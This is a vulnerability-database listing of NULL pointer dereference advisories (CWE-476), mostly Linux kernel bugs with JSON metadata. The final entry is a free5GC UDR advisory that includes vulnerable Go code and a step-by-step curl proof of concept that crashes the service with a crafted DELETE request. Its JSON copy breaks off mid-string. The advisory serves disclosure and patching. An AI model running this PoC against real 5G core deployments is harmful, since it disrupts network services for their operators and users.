Common Weakness Enumeration

CWE-476

Allowed

NULL Pointer Dereference

Abstraction: Base · Status: Stable

The product dereferences a pointer that it expects to be valid but is NULL.

6310 vulnerabilities reference this CWE, most recent first.

GHSA-4R7G-QQXF-M6V8

Vulnerability from github – Published: 2025-02-27 03:34 – Updated: 2026-05-12 15:30
VLAI
Details

In the Linux kernel, the following vulnerability has been resolved:

USB: hub: Ignore non-compliant devices with too many configs or interfaces

Robert Morris created a test program which can cause usb_hub_to_struct_hub() to dereference a NULL or inappropriate pointer:

Oops: general protection fault, probably for non-canonical address 0xcccccccccccccccc: 0000 [#1] SMP DEBUG_PAGEALLOC PTI CPU: 7 UID: 0 PID: 117 Comm: kworker/7:1 Not tainted 6.13.0-rc3-00017-gf44d154d6e3d #14 Hardware name: FreeBSD BHYVE/BHYVE, BIOS 14.0 10/17/2021 Workqueue: usb_hub_wq hub_event RIP: 0010:usb_hub_adjust_deviceremovable+0x78/0x110 ... Call Trace: ? die_addr+0x31/0x80 ? exc_general_protection+0x1b4/0x3c0 ? asm_exc_general_protection+0x26/0x30 ? usb_hub_adjust_deviceremovable+0x78/0x110 hub_probe+0x7c7/0xab0 usb_probe_interface+0x14b/0x350 really_probe+0xd0/0x2d0 ? __pfxdeviceattach_driver+0x10/0x10 driver_probe_device+0x6e/0x110 driver_probe_device+0x1a/0x90 __device_attach_driver+0x7e/0xc0 bus_for_each_drv+0x7f/0xd0 __device_attach+0xaa/0x1a0 bus_probe_device+0x8b/0xa0 device_add+0x62e/0x810 usb_set_configuration+0x65d/0x990 usb_generic_driver_probe+0x4b/0x70 usb_probe_device+0x36/0xd0

The cause of this error is that the device has two interfaces, and the hub driver binds to interface 1 instead of interface 0, which is where usb_hub_to_struct_hub() looks.

We can prevent the problem from occurring by refusing to accept hub devices that violate the USB spec by having more than one configuration or interface.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-21776"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-476"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-02-27T03:15:18Z",
    "severity": "MODERATE"
  },
  "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nUSB: hub: Ignore non-compliant devices with too many configs or interfaces\n\nRobert Morris created a test program which can cause\nusb_hub_to_struct_hub() to dereference a NULL or inappropriate\npointer:\n\nOops: general protection fault, probably for non-canonical address\n0xcccccccccccccccc: 0000 [#1] SMP DEBUG_PAGEALLOC PTI\nCPU: 7 UID: 0 PID: 117 Comm: kworker/7:1 Not tainted 6.13.0-rc3-00017-gf44d154d6e3d #14\nHardware name: FreeBSD BHYVE/BHYVE, BIOS 14.0 10/17/2021\nWorkqueue: usb_hub_wq hub_event\nRIP: 0010:usb_hub_adjust_deviceremovable+0x78/0x110\n...\nCall Trace:\n \u003cTASK\u003e\n ? die_addr+0x31/0x80\n ? exc_general_protection+0x1b4/0x3c0\n ? asm_exc_general_protection+0x26/0x30\n ? usb_hub_adjust_deviceremovable+0x78/0x110\n hub_probe+0x7c7/0xab0\n usb_probe_interface+0x14b/0x350\n really_probe+0xd0/0x2d0\n ? __pfx___device_attach_driver+0x10/0x10\n __driver_probe_device+0x6e/0x110\n driver_probe_device+0x1a/0x90\n __device_attach_driver+0x7e/0xc0\n bus_for_each_drv+0x7f/0xd0\n __device_attach+0xaa/0x1a0\n bus_probe_device+0x8b/0xa0\n device_add+0x62e/0x810\n usb_set_configuration+0x65d/0x990\n usb_generic_driver_probe+0x4b/0x70\n usb_probe_device+0x36/0xd0\n\nThe cause of this error is that the device has two interfaces, and the\nhub driver binds to interface 1 instead of interface 0, which is where\nusb_hub_to_struct_hub() looks.\n\nWe can prevent the problem from occurring by refusing to accept hub\ndevices that violate the USB spec by having more than one\nconfiguration or interface.",
  "id": "GHSA-4r7g-qqxf-m6v8",
  "modified": "2026-05-12T15:30:49Z",
  "published": "2025-02-27T03:34:06Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-21776"
    },
    {
      "type": "WEB",
      "url": "https://cert-portal.siemens.com/productcert/html/ssa-265688.html"
    },
    {
      "type": "WEB",
      "url": "https://cert-portal.siemens.com/productcert/html/ssa-503939.html"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/2240fed37afbcdb5e8b627bc7ad986891100e05d"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/49f077106fa07919a6a6dda99bb490dd1d1a8218"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/5b9778e1fe715700993ce436c152dc3b7df0b490"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/62d8f4c5454dd39aded4f343720d1c5a1803cfef"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/c3720b04df84b5459050ae4e03ec7d545652f897"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/d343fe0fad5c1d689775f2dda24a85ce98e29566"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/d3a67adb365cdfdac4620daf38a82e57ca45806c"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/e905a0fca7bff0855d312c16f71e60e1773b393e"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2025/03/msg00028.html"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2025/05/msg00030.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-4R7R-87CF-RC4R

Vulnerability from github – Published: 2022-05-14 00:58 – Updated: 2022-05-14 00:58
VLAI
Details

In the Linux kernel before 4.20.14, expand_downwards in mm/mmap.c lacks a check for the mmap minimum address, which makes it easier for attackers to exploit kernel NULL pointer dereferences on non-SMAP platforms. This is related to a capability check for the wrong task.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2019-9213"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-476"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2019-03-05T22:29:00Z",
    "severity": "MODERATE"
  },
  "details": "In the Linux kernel before 4.20.14, expand_downwards in mm/mmap.c lacks a check for the mmap minimum address, which makes it easier for attackers to exploit kernel NULL pointer dereferences on non-SMAP platforms. This is related to a capability check for the wrong task.",
  "id": "GHSA-4r7r-87cf-rc4r",
  "modified": "2022-05-14T00:58:07Z",
  "published": "2022-05-14T00:58:07Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-9213"
    },
    {
      "type": "WEB",
      "url": "https://github.com/torvalds/linux/commit/0a1d52994d440e21def1c2174932410b4f2a98a1"
    },
    {
      "type": "WEB",
      "url": "https://www.exploit-db.com/exploits/46502"
    },
    {
      "type": "WEB",
      "url": "https://usn.ubuntu.com/3933-2"
    },
    {
      "type": "WEB",
      "url": "https://usn.ubuntu.com/3933-1"
    },
    {
      "type": "WEB",
      "url": "https://usn.ubuntu.com/3932-2"
    },
    {
      "type": "WEB",
      "url": "https://usn.ubuntu.com/3932-1"
    },
    {
      "type": "WEB",
      "url": "https://usn.ubuntu.com/3931-2"
    },
    {
      "type": "WEB",
      "url": "https://usn.ubuntu.com/3931-1"
    },
    {
      "type": "WEB",
      "url": "https://usn.ubuntu.com/3930-2"
    },
    {
      "type": "WEB",
      "url": "https://usn.ubuntu.com/3930-1"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2019/05/msg00002.html"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2019/04/msg00004.html"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2019/03/msg00034.html"
    },
    {
      "type": "WEB",
      "url": "https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.9.162"
    },
    {
      "type": "WEB",
      "url": "https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.20.14"
    },
    {
      "type": "WEB",
      "url": "https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.19.27"
    },
    {
      "type": "WEB",
      "url": "https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.14.105"
    },
    {
      "type": "WEB",
      "url": "https://bugs.chromium.org/p/project-zero/issues/detail?id=1792"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2019:1480"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2019:1479"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2019:0831"
    },
    {
      "type": "WEB",
      "url": "http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=0a1d52994d440e21def1c2174932410b4f2a98a1"
    },
    {
      "type": "WEB",
      "url": "http://lists.opensuse.org/opensuse-security-announce/2019-03/msg00045.html"
    },
    {
      "type": "WEB",
      "url": "http://lists.opensuse.org/opensuse-security-announce/2019-04/msg00052.html"
    },
    {
      "type": "WEB",
      "url": "http://packetstormsecurity.com/files/156053/Reliable-Datagram-Sockets-RDS-rds_atomic_free_op-Privilege-Escalation.html"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/107296"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-4R9G-C2FJ-783P

Vulnerability from github – Published: 2025-09-18 18:30 – Updated: 2025-12-11 18:30
VLAI
Details

In the Linux kernel, the following vulnerability has been resolved:

ice: Block switchdev mode when ADQ is active and vice versa

ADQ and switchdev are not supported simultaneously. Enabling both at the same time can result in nullptr dereference.

To prevent this, check if ADQ is active when changing devlink mode to switchdev mode, and check if switchdev is active when enabling ADQ.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-53442"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-476"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-09-18T16:15:48Z",
    "severity": "MODERATE"
  },
  "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nice: Block switchdev mode when ADQ is active and vice versa\n\nADQ and switchdev are not supported simultaneously. Enabling both at the\nsame time can result in nullptr dereference.\n\nTo prevent this, check if ADQ is active when changing devlink mode to\nswitchdev mode, and check if switchdev is active when enabling ADQ.",
  "id": "GHSA-4r9g-c2fj-783p",
  "modified": "2025-12-11T18:30:35Z",
  "published": "2025-09-18T18:30:28Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-53442"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/1c82d1b736ce85e77fd4da05eca6f1f4a52a2bc3"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/24f0d69da35d812b3a1104918014a29627140cb1"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/43d00e102d9ecbe2635d7e3f2e14d2e90183d6af"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-4R9H-GPVV-2XG3

Vulnerability from github – Published: 2022-05-14 01:39 – Updated: 2022-05-14 01:39
VLAI
Details

The /dev/block/mmcblk0rpmb driver kernel module on Qiku 360 Phone N6 Pro 1801-A01 devices allows attackers to cause a denial of service (NULL pointer dereference and device crash) via a crafted 0xc0d8b300 ioctl call.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2018-18318"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-476"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2018-10-15T05:29:00Z",
    "severity": "HIGH"
  },
  "details": "The /dev/block/mmcblk0rpmb driver kernel module on Qiku 360 Phone N6 Pro 1801-A01 devices allows attackers to cause a denial of service (NULL pointer dereference and device crash) via a crafted 0xc0d8b300 ioctl call.",
  "id": "GHSA-4r9h-gpvv-2xg3",
  "modified": "2022-05-14T01:39:31Z",
  "published": "2022-05-14T01:39:31Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-18318"
    },
    {
      "type": "WEB",
      "url": "https://github.com/datadancer/HIAFuzz/blob/master/360%20Phone%20N6%20Pro%20Kernel%20Vuln.md"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-4RGX-HJQW-P9F3

Vulnerability from github – Published: 2024-10-21 18:30 – Updated: 2026-05-12 12:32
VLAI
Details

In the Linux kernel, the following vulnerability has been resolved:

drm/amd/pm: ensure the fw_info is not null before using it

This resolves the dereference null return value warning reported by Coverity.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-49890"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-476"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-10-21T18:15:11Z",
    "severity": "MODERATE"
  },
  "details": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amd/pm: ensure the fw_info is not null before using it\n\nThis resolves the dereference null return value warning\nreported by Coverity.",
  "id": "GHSA-4rgx-hjqw-p9f3",
  "modified": "2026-05-12T12:32:10Z",
  "published": "2024-10-21T18:30:57Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-49890"
    },
    {
      "type": "WEB",
      "url": "https://cert-portal.siemens.com/productcert/html/ssa-265688.html"
    },
    {
      "type": "WEB",
      "url": "https://cert-portal.siemens.com/productcert/html/ssa-355557.html"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/016bf0294b401246471c6710c6bf9251616228b6"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/186fb12e7a7b038c2710ceb2fb74068f1b5d55a4"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/29f388945770bd0a6c82711436b2bc98b0dfac92"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/8adf4408d482faa51b2c14e60bfd9946ec1911a4"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/9550d8d6f19fac7623f044ae8d9503825b325497"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/b511474f49588cdca355ebfce54e7eddbf7b75a5"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/fd5f4ac1a986f0e7e9fa019201b5890554f87bcf"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2025/03/msg00002.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-4RJ6-GCF8-WCHC

Vulnerability from github – Published: 2022-10-19 12:00 – Updated: 2025-11-03 21:30
VLAI
Details

A vulnerability was found in Linux Kernel. It has been classified as problematic. This affects the function find_prog_by_sec_insn of the file tools/lib/bpf/libbpf.c of the component BPF. The manipulation leads to null pointer dereference. It is recommended to apply a patch to fix this issue. The identifier VDB-211749 was assigned to this vulnerability.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-3606"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-404",
      "CWE-476"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-10-19T09:15:00Z",
    "severity": "MODERATE"
  },
  "details": "A vulnerability was found in Linux Kernel. It has been classified as problematic. This affects the function find_prog_by_sec_insn of the file tools/lib/bpf/libbpf.c of the component BPF. The manipulation leads to null pointer dereference. It is recommended to apply a patch to fix this issue. The identifier VDB-211749 was assigned to this vulnerability.",
  "id": "GHSA-4rj6-gcf8-wchc",
  "modified": "2025-11-03T21:30:44Z",
  "published": "2022-10-19T12:00:18Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-3606"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/pub/scm/linux/kernel/git/bpf/bpf-next.git/commit/?id=d0d382f95a9270dcf803539d6781d6bd67e3f5b2"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2025/04/msg00033.html"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?id.211749"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-4RPC-8842-RQ53

Vulnerability from github – Published: 2026-05-08 15:31 – Updated: 2026-05-21 15:34
VLAI
Details

In the Linux kernel, the following vulnerability has been resolved:

scsi: mpi3mr: Add NULL checks when resetting request and reply queues

The driver encountered a crash during resource cleanup when the reply and request queues were NULL due to freed memory. This issue occurred when the creation of reply or request queues failed, and the driver freed the memory first, but attempted to mem set the content of the freed memory, leading to a system crash.

Add NULL pointer checks for reply and request queues before accessing the reply/request memory during cleanup

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-43473"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-476"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-05-08T15:17:00Z",
    "severity": "MODERATE"
  },
  "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: mpi3mr: Add NULL checks when resetting request and reply queues\n\nThe driver encountered a crash during resource cleanup when the reply and\nrequest queues were NULL due to freed memory.  This issue occurred when the\ncreation of reply or request queues failed, and the driver freed the memory\nfirst, but attempted to mem set the content of the freed memory, leading to\na system crash.\n\nAdd NULL pointer checks for reply and request queues before accessing the\nreply/request memory during cleanup",
  "id": "GHSA-4rpc-8842-rq53",
  "modified": "2026-05-21T15:34:02Z",
  "published": "2026-05-08T15:31:30Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43473"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/220d7ca70611a73d50ef8e9edac630ed1ececb7c"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/78d3f201f8b609928eade53cf03a52df5415aaf7"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/7da755e0d02e9ca035065127e108d1fed8950dc8"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/7df0296ad4e9253d12c6dbe7f120044dddc95600"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/e978a36f332ede78eb4de037b517db16265d420d"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/f8e833572a3e12a2a1ffe7b3646af024264d38ca"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/fa96392ebebc8fade2b878acb14cce0f71016503"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-4RQF-GRM6-VF75

Vulnerability from github – Published: 2026-05-08 22:52 – Updated: 2026-06-08 23:48
VLAI
Summary
free5GC's UDR nudr-dr DELETE amf-subscriptions panics on missing subsId when UE state exists (nil pointer dereference)
Details

Summary

free5GC's UDR nudr-dr DELETE /subscription-data/{ueId}/{servingPlmnId}/ee-subscriptions/{subsId}/amf-subscriptions handler contains a nil-pointer dereference reachable from a single authenticated request, after one preparatory authenticated EE-subscription create. The handler checks _, ok = UESubsData.EeSubscriptionCollection[subsId] and sets a 404 problem-details on the miss path, but then continues to UESubsData.EeSubscriptionCollection[subsId].AmfSubscriptionInfos -- dereferencing the same missing entry instead of returning. Gin recovery converts the panic into HTTP 500, but the endpoint remains repeatedly panicable.

This endpoint requires a valid nudr-dr OAuth2 access token (i.e. PR:L, NOT PR:N), so this is scored as an authenticated panic-DoS, not as an unauth-bypass finding.

Details

Validated against the UDR container in the official Docker compose lab. - Source repo tag: v4.2.1 - Running Docker image: free5gc/udr:v4.2.1 - Runtime UDR commit: 754d23b0 - Docker validation date: 2026-03-22 - UDR endpoint: http://10.100.200.11:8000

Precondition (one authenticated EE-subscription create allocates UE state):

if !ok {
    udrSelf.UESubsCollection.Store(ueId, new(udr_context.UESubsData))
    value, _ = udrSelf.UESubsCollection.Load(ueId)
}
...
UESubsData.EeSubscriptionCollection[newSubscriptionID] = new(udr_context.EeSubscriptionCollection)

Vulnerable handler (delete on amf-subscriptions): the ok miss path sets pd but does not return, so the very next line dereferences the nil entry:

_, ok = UESubsData.EeSubscriptionCollection[subsId]
if !ok {
    pd = util.ProblemDetailsNotFound("SUBSCRIPTION_NOT_FOUND")
}

if UESubsData.EeSubscriptionCollection[subsId].AmfSubscriptionInfos == nil {
    pd = util.ProblemDetailsNotFound("AMFSUBSCRIPTION_NOT_FOUND")
}

When subsId is absent, UESubsData.EeSubscriptionCollection[subsId] is nil, and .AmfSubscriptionInfos panics with runtime error: invalid memory address or nil pointer dereference.

Code evidence (paths in free5gc/udr): - Precondition route + handler (EE-subscription create that allocates UE state): - NFs/udr/internal/sbi/api_datarepository.go:600 - NFs/udr/internal/sbi/api_datarepository.go:602 - NFs/udr/internal/sbi/api_datarepository.go:2528 - NFs/udr/internal/sbi/processor/event_exposure_subscriptions_collection.go:25 - NFs/udr/internal/sbi/processor/event_exposure_subscriptions_collection.go:30 - NFs/udr/internal/sbi/processor/event_exposure_subscriptions_collection.go:38 - Vulnerable delete route + dispatch: - NFs/udr/internal/sbi/api_datarepository.go:2161 - NFs/udr/internal/sbi/api_datarepository.go:2172 - Panic root cause (nil deref): - NFs/udr/internal/sbi/processor/event_amf_subscription_info_document.go:62 - NFs/udr/internal/sbi/processor/event_amf_subscription_info_document.go:64 - NFs/udr/internal/sbi/processor/event_amf_subscription_info_document.go:69

PoC

Reproduced end-to-end against the running UDR at http://10.100.200.11:8000.

  1. Restart UDR (clean state):
docker restart udr
  1. Obtain a valid nudr-dr token from NRF:
curl -sS -X POST 'http://10.100.200.3:8000/oauth2/token' \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  --data 'grant_type=client_credentials&nfType=NEF&nfInstanceId=eb9990de-4cd3-41b0-b5d9-c2102b088c57&targetNfType=UDR&scope=nudr-dr'
  1. Create one EE subscription to populate UESubsCollection for ueId=x:
curl -i -sS -X POST \
  'http://10.100.200.11:8000/nudr-dr/v2/subscription-data/x/context-data/ee-subscriptions' \
  -H 'Authorization: Bearer <valid_nudr_dr_jwt>' \
  -H 'Content-Type: application/json' \
  --data '{}'
HTTP/1.1 201 Created
  1. Trigger the panic with a nonexistent subsId:
curl -i -sS -X DELETE \
  'http://10.100.200.11:8000/nudr-dr/v2/subscription-data/x/bad/ee-subscriptions/x/amf-subscriptions' \
  -H 'Authorization: Bearer <valid_nudr_dr_jwt>'
HTTP/1.1 500 Internal Server Error
Content-Length: 0
  1. UDR container logs (docker logs udr) confirm the nil-pointer panic at event_amf_subscription_info_document.go:69 inside RemoveAmfSubscriptionsInfoProcedure:
[ERRO][UDR][GIN] panic: runtime error: invalid memory address or nil pointer dereference
github.com/free5gc/udr/internal/sbi/processor.(*Processor).RemoveAmfSubscriptionsInfoProcedure
    .../event_amf_subscription_info_document.go:69
github.com/free5gc/udr/internal/sbi.(*Server).HandleRemoveAmfSubscriptionsInfo
    .../api_datarepository.go:2172
[INFO][UDR][GIN] | 500 | DELETE | /nudr-dr/v2/subscription-data/x/bad/ee-subscriptions/x/amf-subscriptions |

Impact

NULL pointer dereference (CWE-476) in an authenticated UDR data-repository handler, caused by improper handling of the missing-subsId branch (CWE-754): the handler sets a problem-details value but does not return, then dereferences the same missing map entry.

This is NOT framed as an auth-bypass finding: the endpoint requires a valid nudr-dr OAuth2 access token. A network attacker who already holds (or can obtain) a valid token can: - Trigger a reliable, repeatable nil-deref panic on the amf-subscriptions delete route after one preparatory POST that allocates UE state for the chosen ueId. - Repeat the trigger to sustain a per-request panic-DoS on UDR's data-repository surface, with each panic costing more CPU + log writes than the intended 404 SUBSCRIPTION_NOT_FOUND response would have.

No Confidentiality impact (the response is 500 with empty body; no UE data is returned to the attacker via the panic). No persistent Integrity impact from the panic itself (the EE subscription created during the precondition is in-memory state owned by UDR's intended data-repository semantics, and is not corrupted by the delete-time panic). Availability impact is limited to per-request degradation (Gin recovers; the UDR process keeps running).

Affected: free5gc v4.2.1.

Upstream issue: https://github.com/free5gc/free5gc/issues/919 Upstream fix: https://github.com/free5gc/udr/pull/60

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/free5gc/udr"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.4.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-44323"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-476"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-08T22:52:00Z",
    "nvd_published_at": "2026-05-27T17:16:37Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\nfree5GC\u0027s UDR `nudr-dr` `DELETE /subscription-data/{ueId}/{servingPlmnId}/ee-subscriptions/{subsId}/amf-subscriptions` handler contains a nil-pointer dereference reachable from a single authenticated request, after one preparatory authenticated EE-subscription create. The handler checks `_, ok = UESubsData.EeSubscriptionCollection[subsId]` and sets a `404` problem-details on the miss path, but then continues to `UESubsData.EeSubscriptionCollection[subsId].AmfSubscriptionInfos` -- dereferencing the same missing entry instead of returning. Gin recovery converts the panic into `HTTP 500`, but the endpoint remains repeatedly panicable.\n\nThis endpoint requires a valid `nudr-dr` OAuth2 access token (i.e. PR:L, NOT PR:N), so this is scored as an authenticated panic-DoS, not as an unauth-bypass finding.\n\n### Details\nValidated against the UDR container in the official Docker compose lab.\n- Source repo tag: `v4.2.1`\n- Running Docker image: `free5gc/udr:v4.2.1`\n- Runtime UDR commit: `754d23b0`\n- Docker validation date: 2026-03-22\n- UDR endpoint: `http://10.100.200.11:8000`\n\nPrecondition (one authenticated EE-subscription create allocates UE state):\n```go\nif !ok {\n    udrSelf.UESubsCollection.Store(ueId, new(udr_context.UESubsData))\n    value, _ = udrSelf.UESubsCollection.Load(ueId)\n}\n...\nUESubsData.EeSubscriptionCollection[newSubscriptionID] = new(udr_context.EeSubscriptionCollection)\n```\n\nVulnerable handler (delete on amf-subscriptions): the `ok` miss path sets `pd` but does not return, so the very next line dereferences the nil entry:\n```go\n_, ok = UESubsData.EeSubscriptionCollection[subsId]\nif !ok {\n    pd = util.ProblemDetailsNotFound(\"SUBSCRIPTION_NOT_FOUND\")\n}\n\nif UESubsData.EeSubscriptionCollection[subsId].AmfSubscriptionInfos == nil {\n    pd = util.ProblemDetailsNotFound(\"AMFSUBSCRIPTION_NOT_FOUND\")\n}\n```\nWhen `subsId` is absent, `UESubsData.EeSubscriptionCollection[subsId]` is nil, and `.AmfSubscriptionInfos` panics with `runtime error: invalid memory address or nil pointer dereference`.\n\nCode evidence (paths in `free5gc/udr`):\n- Precondition route + handler (EE-subscription create that allocates UE state):\n  - `NFs/udr/internal/sbi/api_datarepository.go:600`\n  - `NFs/udr/internal/sbi/api_datarepository.go:602`\n  - `NFs/udr/internal/sbi/api_datarepository.go:2528`\n  - `NFs/udr/internal/sbi/processor/event_exposure_subscriptions_collection.go:25`\n  - `NFs/udr/internal/sbi/processor/event_exposure_subscriptions_collection.go:30`\n  - `NFs/udr/internal/sbi/processor/event_exposure_subscriptions_collection.go:38`\n- Vulnerable delete route + dispatch:\n  - `NFs/udr/internal/sbi/api_datarepository.go:2161`\n  - `NFs/udr/internal/sbi/api_datarepository.go:2172`\n- Panic root cause (nil deref):\n  - `NFs/udr/internal/sbi/processor/event_amf_subscription_info_document.go:62`\n  - `NFs/udr/internal/sbi/processor/event_amf_subscription_info_document.go:64`\n  - `NFs/udr/internal/sbi/processor/event_amf_subscription_info_document.go:69`\n\n### PoC\nReproduced end-to-end against the running UDR at `http://10.100.200.11:8000`.\n\n1. Restart UDR (clean state):\n```\ndocker restart udr\n```\n\n2. Obtain a valid `nudr-dr` token from NRF:\n```\ncurl -sS -X POST \u0027http://10.100.200.3:8000/oauth2/token\u0027 \\\n  -H \u0027Content-Type: application/x-www-form-urlencoded\u0027 \\\n  --data \u0027grant_type=client_credentials\u0026nfType=NEF\u0026nfInstanceId=eb9990de-4cd3-41b0-b5d9-c2102b088c57\u0026targetNfType=UDR\u0026scope=nudr-dr\u0027\n```\n\n3. Create one EE subscription to populate `UESubsCollection` for `ueId=x`:\n```\ncurl -i -sS -X POST \\\n  \u0027http://10.100.200.11:8000/nudr-dr/v2/subscription-data/x/context-data/ee-subscriptions\u0027 \\\n  -H \u0027Authorization: Bearer \u003cvalid_nudr_dr_jwt\u003e\u0027 \\\n  -H \u0027Content-Type: application/json\u0027 \\\n  --data \u0027{}\u0027\n```\n```\nHTTP/1.1 201 Created\n```\n\n4. Trigger the panic with a nonexistent `subsId`:\n```\ncurl -i -sS -X DELETE \\\n 